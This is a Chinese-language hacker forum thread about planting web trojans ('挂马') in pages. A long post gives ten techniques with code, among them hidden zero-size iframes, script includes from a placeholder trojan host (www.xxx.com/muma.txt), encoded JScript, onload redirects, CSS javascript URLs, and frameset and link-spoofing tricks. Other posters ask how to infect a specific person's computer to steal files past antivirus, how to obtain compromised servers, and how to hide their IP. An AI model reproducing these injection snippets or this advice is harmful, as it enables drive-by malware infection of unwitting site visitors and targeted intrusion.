现在还有一个比较流行的吧... 就是FLASH 插网马  一打开 FLASH 就..........

不明白，像百度、新浪这样的中国顶级门户的博客也能被挂马？哪位高手指点一二？

txt挂马法:
我想这个意思就是JS变形加密一种挂马方法吧

<SCRPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀,没错吧!

下面我就针对挂马方法发表下吧:

引用:

一:框架挂马
<iframe src=地址 width=0 height=0></iframe>



二:js文件挂马
首先将以下代码
document.write("<iframe width=&#39;0&#39; height=&#39;
&#39; src=&#39;地址&#39;></iframe>");
保存为xxx.js，
则JS挂马代码为
<script language=javascript src=xxx.js></script>



三:js变形加密
<SCR
PT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀



四:body挂马
<body onload="
indow.location=&#39;地址&#39;;"></body>



五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + &#39;\r\n<iframe sr
="http://www.xxx.com/muma.htm/"></iframe>&#39;;



六:css中挂马
body {
background-image: url(&#39;javascript:document.write("
script src=http://www.XXX.net/muma.js></script>")&#39;)}



七:JAJA挂马
<SCRIPT language=javascript>
window.open ("地址","
,"toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>



八:图片伪装

<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>

九:伪装调用：
<frameset
rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">

<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>

十:高级欺

<a href="http://www.163.com(迷惑连接地址，显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a>
<SCRIP
Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no
directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");

}
</SCRIPT>

引用:

引用第23楼黑77于2007-03-05 22:26发表的 :


错，TXT挂马不是把一张图片换了后缀

而是把网页文件换了后缀……

还好...不是加个后缀..
要不然..那叫什么.txt挂马.............

我知道一个人的油箱 和QQ号码   可是对方警惕性比较高.EXE格式的东西不打开

他用瑞星杀软  那位老大能告诉我  怎么样才能给他种上我的马

这个人电脑里有我非常想要的东西.而我接触这个才2月属于白痴型的   求助啊!

总结得不错
值得学下，把大家提的每样都学会，灵活运用下就强了

其实没有那么明确的界限了

最多情况也就是钓鱼了和挂马了
但有时候两者有可以混起来说

29楼 －_—!!!

引用:

原帖由 fqzdn 于 2008-1-29 02:41 发表
我知道一个人的油箱 和QQ号码   可是对方警惕性比较高.EXE格式的东西不打开

他用瑞星杀软  那位老大能告诉我  怎么样才能给他种上我的马

这个人电脑里有我非常想要的东西.而我接触这个才2月属于白痴型的   求助啊! ...

学习的动机真强烈啊，
佩服死了

引用:

原帖由 无敌小龙 于 2007-1-18 14:17 发表
mdb挂马，doc挂吗，txt格式挂马还米听过

mdb.doc挂马应该是捆绑吧，TXT还真没听说过，个人感觉就是挂网马最好用

貌似迅雷挂马的效果很不错哦

　　从各位的讲法可知，大部分的“马”，都需要执行人的执行，不执行应该就可以避免，所以应该说好的伪装才是最重要的，有哪位可以介绍一下具体的应用方法？

doc挂马应该就是利用office的漏洞吧；
txt可以挂马，以前在X看到过。

搞个服务器作肉鸡 那就爽了

在寻找肉鸡的时候，怎么样同时隐藏自己的ip？